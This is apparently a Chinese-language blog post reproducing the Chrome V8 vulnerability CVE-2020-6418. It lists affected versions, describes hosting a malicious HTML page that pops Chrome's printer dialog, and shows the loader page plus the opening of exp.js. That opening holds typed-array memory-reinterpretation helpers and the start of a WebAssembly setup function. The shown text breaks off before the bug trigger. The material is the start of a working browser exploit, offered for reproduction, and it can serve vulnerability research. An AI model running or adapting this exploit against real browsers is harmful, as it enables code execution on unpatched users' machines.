CVE-2020-6418 是 2020 年 2 月 24 日 Google 公布的一个 Chrome 浏览器高危漏洞。下面复现一下，感受一下。
影响版本
Chrome < 80.0.3987.122
漏洞复现
测试的Chrome版本为80.0.3987.87
在 web 服务器上部署恶意 html 页面，访问该页面触发弹出 Chrome 内置打印机。
- html
<html lang="en">
<head>
<meta charset="UTF-8">
<title>test</title>
<!-- exp.js (listed below) is referenced by a relative path, so it is fetched from the same location as this page -->
<script type="text/javascript" src="exp.js"></script>
</head>
</html>
exp.js:
// Loop bound; where it is consumed is not visible in this excerpt.
const MAX_ITERATIONS = 0x10000;
// NOTE(review): 1020*4 = 4080; its use is outside this excerpt — confirm against the rest of exp.js.
var maxSize = 1020*4;
// One 16-byte buffer shared by three typed-array views. Writing through one
// view and reading through another reinterprets the same bytes, which is
// what f2i/i2f/f2half/half2f below rely on.
var buf =new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
var uint32 = new Uint32Array(buf);
// Reinterpret a double's 8 bytes as an unsigned 64-bit integer (BigInt).
// Relies on the module-level float64 and bigUint64 views sharing one buffer.
function f2i(f)
{
  // Store through the double view, read back through the uint64 view.
  float64[0] = f;
  const [bits] = bigUint64;
  return bits;
}
// Reinterpret an unsigned 64-bit integer (BigInt) as a double.
// Inverse of f2i; uses the same shared-buffer views.
function i2f(i)
{
  // Store through the uint64 view, read back through the double view.
  bigUint64[0] = i;
  const [asDouble] = float64;
  return asDouble;
}
function f2half(val)
{
float64[0]= val;
let tmp = Array.from(uint32);
return tmp;
}
// Assemble a double from its two 32-bit words (inverse of f2half).
// `val` is any array-like of 32-bit words; uint32.set copies as many
// elements as `val` provides.
function half2f(val)
{
  uint32.set(val);
  const [asDouble] = float64;
  return asDouble;
}
// Format an integer (Number or BigInt) as a 0x-prefixed, zero-padded
// 16-digit hexadecimal string.
function hex(i)
{
  const digits = i.toString(16).padStart(16, "0");
  return `0x${digits}`;
}
function wasm_func() {
var wasmImports = {
env: {
puts: function puts (index) {
print(utf8ToString(h, index));
}
}
};